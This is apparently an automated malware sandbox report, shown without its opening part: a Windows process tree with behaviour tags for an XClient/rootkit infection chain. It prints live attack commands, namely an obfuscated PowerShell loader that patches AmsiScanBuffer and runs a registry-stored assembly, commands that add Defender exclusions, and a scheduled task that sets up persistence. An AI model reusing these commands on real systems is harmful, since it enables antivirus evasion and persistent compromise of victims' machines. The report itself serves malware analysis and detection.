C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{8c7edfd2-a4e5-41af-8edf-91f025b5b39a}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1184
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Suspicious use of WriteProcessMemory
PID:668
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:956
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:440
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:928
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1076
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1092
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1108 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2744
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:KdEwxYVDnpWT{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$JZhxlpDURoYORR,[Parameter(Position=1)][Type]$JuXdxXTaTy)$YCzGKVoIVUf=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+'f'+'l'+''+[Char](101)+'c'+'t'+''+[Char](101)+''+[Char](100)+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+'Me'+'m'+''+'o'+''+[Char](114)+''+'y'+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+'l'+[Char](101)+'',$False).DefineType('M'+[Char](121)+''+'D'+''+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+'e',''+[Char](67)+''+'l'+''+'a'+''+'s'+''+'s'+''+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+'l'+'e'+[Char](100)+''+','+'A'+'n'+''+[Char](115)+''+[Char](105)+''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+','+''+'A'+''+[Char](117)+''+'t'+''+'o'+''+[Char](67)+'l'+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$YCzGKVoIVUf.DefineConstructor(''+'R'+''+[Char](84)+''+'S'+''+'p'+''+'e'+''+'c'+''+[Char](105)+''+[Char](97)+''+'l'+''+'N'+''+'a'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'H'+''+'i'+''+[Char](100)+''+'e'+'By'+'S'+''+'i'+''+[Char](103)+''+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$JZhxlpDURoYORR).SetImplementationFlags('Ru'+'n'+'t'+[Char](105)+'m'+'e'+','+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+'g'+'e'+'d'+'');$YCzGKVoIVUf.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+'o'+'k'+''+[Char](101)+'','P'+'u'+''+[Char](98)+''+'l'+''+[Char](105)+'c'+[Char](44)+''+[Char](72)+'i'+[Char](100)+''+'e'+'By'+'S'+'i'+[Char](103)+','+'N'+'e'+[Char](119)+'S'+[Char](108)+''+'o'+''+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$JuXdxXTaTy,$JZhxlpDURoYORR).SetImplementationFlags(''+[Char](82)+''+'u'+'nti'+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+[Char](97)+''+[Char](110)+''+[Char](97)+'ge'+[Char](100)+'');Write-Output $YCzGKVoIVUf.CreateType();}$phJloYXxTIFUk=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sys'+'t'+''+'e'+''+'m'+''+[Char](46)+'d'+[Char](108)+'l')}).GetType('Mi'+[Char](99)+''+[Char](114)+''+[Char](111)+''+[Char](115)+'o'+'f'+''+[Char](116)+''+'.'+''+'W'+''+'i'+''+[Char](110)+''+'3'+''+'2'+''+[Char](46)+''+'U'+''+'n'+'sa'+'f'+''+[Char](101)+''+[Char](78)+'a'+'t'+'i'+[Char](118)+''+[Char](101)+''+'M'+'e'+[Char](116)+''+'h'+''+[Char](111)+'d'+'s'+'');$WtjkcifhdSwNkG=$phJloYXxTIFUk.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+'c'+''+'A'+''+[Char](100)+''+'d'+'r'+[Char](101)+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags]('P'+'u'+''+[Char](98)+'l'+[Char](105)+''+'c'+''+','+''+[Char](83)+'t'+[Char](97)+''+'t'+'i'+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$TtWRDmNZXtinVHqCVBg=KdEwxYVDnpWT @([String])([IntPtr]);$JrMbzHyrVTPQrnGCwEZwlA=KdEwxYVDnpWT @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$BIIPFDHJULU=$phJloYXxTIFUk.GetMethod(''+[Char](71)+'e'+'t'+'M'+'o'+''+'d'+'u'+'l'+''+[Char](101)+'H'+[Char](97)+''+'n'+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+'ne'+[Char](108)+''+'3'+''+[Char](50)+''+'.'+''+[Char](100)+''+[Char](108)+'l')));$NDvdOkgwhXCmJg=$WtjkcifhdSwNkG.Invoke($Null,@([Object]$BIIPFDHJULU,[Object]('L'+[Char](111)+''+[Char](97)+''+'d'+''+[Char](76)+'i'+[Char](98)+''+'r'+''+[Char](97)+''+[Char](114)+'y'+[Char](65)+'')));$UwzAzAaCNMvsSnNUc=$WtjkcifhdSwNkG.Invoke($Null,@([Object]$BIIPFDHJULU,[Object](''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+''+'a'+'l'+[Char](80)+''+[Char](114)+''+'o'+''+[Char](116)+''+[Char](101)+''+[Char](99)+'t')));$BvvrjJC=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NDvdOkgwhXCmJg,$TtWRDmNZXtinVHqCVBg).Invoke('am'+[Char](115)+''+[Char](105)+'.'+[Char](100)+'l'+'l'+'');$kRbIEpScGmqPTFtjX=$WtjkcifhdSwNkG.Invoke($Null,@([Object]$BvvrjJC,[Object](''+[Char](65)+''+'m'+''+'s'+''+'i'+'S'+'c'+'a'+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+'f'+'e'+[Char](114)+'')));$mUyKlkFWZr=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UwzAzAaCNMvsSnNUc,$JrMbzHyrVTPQrnGCwEZwlA).Invoke($kRbIEpScGmqPTFtjX,[uint32]8,4,[ref]$mUyKlkFWZr);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$kRbIEpScGmqPTFtjX,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UwzAzAaCNMvsSnNUc,$JrMbzHyrVTPQrnGCwEZwlA).Invoke($kRbIEpScGmqPTFtjX,[uint32]8,0x20,[ref]$mUyKlkFWZr);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+'T'+'W'+'A'+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](119)+''+[Char](119)+''+[Char](119)+''+[Char](115)+''+[Char](116)+'a'+[Char](103)+''+'e'+'r')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2024
-
-
C:\Users\Public\www.XClient.exeC:\Users\Public\www.XClient.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2448
-
-
C:\Users\Public\www.XClient.exeC:\Users\Public\www.XClient.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2812
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1140
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1272
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1292
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1368
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1448
-
C:\Windows\system32\sihost.exesihost.exe2⤵
- Modifies registry class
PID:2648
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1456
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1532
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1544
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1656
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1680
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1736
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1792
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1868
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1972
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:2000
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2008
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1476
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1016
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2088
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2200
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2372
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2480
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2488
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2664
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2716
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2772
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Enumerates connected drives
PID:2784
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2816
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2836
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:2912
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2896
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3432
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
PID:3460 -
C:\Users\Admin\AppData\Local\Temp\c497fb31def2da64cc0d027cf9355cbcbf22fd7c255e7cbcde9d80efb9937a9e.exe"C:\Users\Admin\AppData\Local\Temp\c497fb31def2da64cc0d027cf9355cbcbf22fd7c255e7cbcde9d80efb9937a9e.exe"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1968 -
C:\Users\Public\dControl.exe"C:\Users\Public\dControl.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4656 -
C:\Users\Public\dControl.exeC:\Users\Public\dControl.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4024 -
C:\Users\Public\dControl.exe"C:\Users\Public\dControl.exe" /TI5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3948 -
C:\Windows\Explorer.exe"C:\Windows\Explorer.exe" windowsdefender:6⤵PID:2144
-
-
C:\Users\Public\dControl.exe"C:\Users\Public\dControl.exe" /EXP |3460|6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2732
-
-
C:\Windows\Explorer.exe"C:\Windows\Explorer.exe" windowsdefender:6⤵PID:3204
-
-
C:\Users\Public\dControl.exe"C:\Users\Public\dControl.exe" /EXP |3460|6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5008
-
-
C:\Windows\Explorer.exe"C:\Windows\Explorer.exe" windowsdefender:6⤵PID:1528
-
-
C:\Users\Public\dControl.exe"C:\Users\Public\dControl.exe" /EXP |3460|6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1512
-
-
C:\Windows\Explorer.exe"C:\Windows\Explorer.exe" windowsdefender:6⤵PID:3304
-
-
C:\Users\Public\dControl.exe"C:\Users\Public\dControl.exe" /EXP |3460|6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4276
-
-
C:\Windows\Explorer.exe"C:\Windows\Explorer.exe" windowsdefender:6⤵PID:4488
-
-
C:\Users\Public\dControl.exe"C:\Users\Public\dControl.exe" /EXP |3460|6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4892
-
-
C:\Windows\Explorer.exe"C:\Windows\Explorer.exe" windowsdefender:6⤵PID:1504
-
-
C:\Users\Public\dControl.exe"C:\Users\Public\dControl.exe" /EXP |3460|6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1580
-
-
C:\Windows\Explorer.exe"C:\Windows\Explorer.exe" windowsdefender:6⤵PID:3052
-
-
C:\Users\Public\dControl.exe"C:\Users\Public\dControl.exe" /EXP |3460|6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3056
-
-
C:\Windows\Explorer.exe"C:\Windows\Explorer.exe" windowsdefender:6⤵PID:392
-
-
C:\Users\Public\dControl.exe"C:\Users\Public\dControl.exe" /EXP |3460|6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4344
-
-
C:\Windows\Explorer.exe"C:\Windows\Explorer.exe" windowsdefender:6⤵PID:3956
-
-
C:\Users\Public\dControl.exe"C:\Users\Public\dControl.exe" /EXP |3460|6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3668
-
-
C:\Windows\Explorer.exe"C:\Windows\Explorer.exe" windowsdefender:6⤵PID:5036
-
-
C:\Users\Public\dControl.exe"C:\Users\Public\dControl.exe" /EXP |3460|6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3144
-
-
C:\Windows\Explorer.exe"C:\Windows\Explorer.exe" windowsdefender:6⤵PID:2036
-
-
C:\Users\Public\dControl.exe"C:\Users\Public\dControl.exe" /EXP |3460|6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2296
-
-
C:\Windows\Explorer.exe"C:\Windows\Explorer.exe" windowsdefender:6⤵PID:2824
-
-
C:\Users\Public\dControl.exe"C:\Users\Public\dControl.exe" /EXP |3460|6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1384
-
-
C:\Windows\Explorer.exe"C:\Windows\Explorer.exe" windowsdefender:6⤵PID:1808
-
-
C:\Users\Public\dControl.exe"C:\Users\Public\dControl.exe" /EXP |3460|6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2628
-
-
C:\Windows\Explorer.exe"C:\Windows\Explorer.exe" windowsdefender:6⤵PID:3392
-
-
C:\Users\Public\dControl.exe"C:\Users\Public\dControl.exe" /EXP |3460|6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1196
-
-
C:\Windows\Explorer.exe"C:\Windows\Explorer.exe" windowsdefender:6⤵PID:4924
-
-
C:\Users\Public\dControl.exe"C:\Users\Public\dControl.exe" /EXP |3460|6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5060
-
-
C:\Windows\Explorer.exe"C:\Windows\Explorer.exe" windowsdefender:6⤵PID:1404
-
-
C:\Users\Public\dControl.exe"C:\Users\Public\dControl.exe" /EXP |3460|6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4376
-
-
C:\Windows\Explorer.exe"C:\Windows\Explorer.exe" windowsdefender:6⤵PID:5108
-
-
C:\Users\Public\dControl.exe"C:\Users\Public\dControl.exe" /EXP |3460|6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2600
-
-
C:\Windows\Explorer.exe"C:\Windows\Explorer.exe" windowsdefender:6⤵PID:3140
-
-
C:\Users\Public\dControl.exe"C:\Users\Public\dControl.exe" /EXP |3460|6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3852
-
-
C:\Windows\Explorer.exe"C:\Windows\Explorer.exe" windowsdefender:6⤵PID:4416
-
-
C:\Users\Public\dControl.exe"C:\Users\Public\dControl.exe" /EXP |3460|6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4368
-
-
C:\Windows\Explorer.exe"C:\Windows\Explorer.exe" windowsdefender:6⤵PID:4312
-
-
C:\Users\Public\dControl.exe"C:\Users\Public\dControl.exe" /EXP |3460|6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1852
-
-
C:\Windows\Explorer.exe"C:\Windows\Explorer.exe" windowsdefender:6⤵PID:1160
-
-
C:\Users\Public\dControl.exe"C:\Users\Public\dControl.exe" /EXP |3460|6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:976
-
-
C:\Windows\Explorer.exe"C:\Windows\Explorer.exe" windowsdefender:6⤵PID:3992
-
-
C:\Users\Public\dControl.exe"C:\Users\Public\dControl.exe" /EXP |3460|6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4564
-
-
C:\Windows\Explorer.exe"C:\Windows\Explorer.exe" windowsdefender:6⤵PID:2396
-
-
C:\Users\Public\dControl.exe"C:\Users\Public\dControl.exe" /EXP |3460|6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:592
-
-
C:\Windows\Explorer.exe"C:\Windows\Explorer.exe" windowsdefender:6⤵PID:5080
-
-
C:\Users\Public\dControl.exe"C:\Users\Public\dControl.exe" /EXP |3460|6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4848
-
-
-
-
-
C:\Users\Public\www.rotkit.exe"C:\Users\Public\www.rotkit.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:740 -
C:\Users\Admin\AppData\Local\Temp\KktXMQ.exeC:\Users\Admin\AppData\Local\Temp\KktXMQ.exe4⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:5060 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ba25650.bat" "5⤵
- System Location Discovery: System Language Discovery
PID:2368
-
-
-
-
C:\Users\Public\www.XClient.exe"C:\Users\Public\www.XClient.exe"3⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3936 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\www.XClient.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2096 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:4196
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'www.XClient.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4344 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:2576
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\www.XClient.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:1832 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:3228
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "www.XClient" /tr "C:\Users\Public\www.XClient.exe"4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2568 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:3752
-
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3676
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3844
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4000
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4188
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:4636
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:5084
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:528
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:2384
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3520
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:684
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:4780
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:2660
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:968
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:844
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:2404
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:3424
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Writes to the Master Boot Record (MBR)
- Checks SCSI registry key(s)
- Enumerates system info in registry
PID:2888
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:5072
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:2312
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:556
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe f8a62276c72d688d761415af97fa9ae4 31s49A6LFk287LekuUJ4Yw.0.1.0.0.01⤵
- Sets service image path in registry
- Modifies data under HKEY_USERS
PID:1964 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:2952
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies registry class
PID:2216
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:4956
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:2388
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
- Checks processor information in registry
PID:2656
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:1608
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies registry class
PID:4556
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:4660
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies registry class
PID:4712
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:1840
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies registry class
PID:1560
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:3668
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies registry class
PID:4652
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:4436
-
